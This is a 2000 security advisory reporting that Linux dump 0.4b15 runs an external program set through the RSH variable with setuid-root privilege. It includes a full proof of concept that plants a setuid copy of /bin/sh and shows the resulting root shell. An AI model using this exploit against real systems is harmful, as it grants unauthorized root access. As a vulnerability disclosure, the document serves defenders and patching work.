Advisories : Linux dump command executes external program with suid

main menu

- feedback
- advertising
- privacy
- FightAIDS
- newsletter
- news

discussions

- read forum
- new topic
- search

meetings

- meetings list
- recent additions
- add your info

top 100 sites

- visit top sites
- sign up now
- members

webmasters

- add your url
- add domain
- search box
- link to us

projects

- our projects
- free email

m4d network

- security software
- secureroot
- m4d.com

Home : Advisories : Linux dump command executes external program with suid

Title:	Linux dump command executes external program with suid
Released by:	mat@hacksware.com
Date:	31st October 2000
Printable version:	Click here

1. Problem:

 Linux dump command executes external program with suid priviledge.

2. Tested Version

 dump-0.4b15

3. Example

 [mat@localhost mat]$ export TAPE=garbage:garbage

[mat@localhost mat]$ export RSH=/home/mat/execute_this

[mat@localhost mat]$ cat > /home/mat/execute_this

#!/bin/sh

cp /bin/sh /home/mat/sh

chmod 4755 /home/mat/sh

[mat@localhost mat]$ chmod 755 /home/mat/execute_this

[mat@localhost mat]$ /sbin/dump -0 /

  DUMP: Connection to garbage established.

  DUMP: Date of this level 0 dump: Tue Oct 31 14:38:00 2000

  DUMP: Date of last level 0 dump: the epoch

  DUMP: Dumping /dev/hda2 (/) to garbage on host garbage

  DUMP: Label: none

/dev/hda2: Permission denied while opening filesystem

 [mat@localhost mat]$ ls -la /home/mat/sh

 -rwsr-xr-x    1 root     tty        316848 Oct 31 14:38 /home/mat/sh

 [mat@localhost mat]$ /home/mat/sh

 bash# id

 uid=500(mat) gid=500(mat) euid=0(root) groups=500(mat)

=================================================

|                                               |

|               mat@hacksware.com               |

|                                               |

=================================================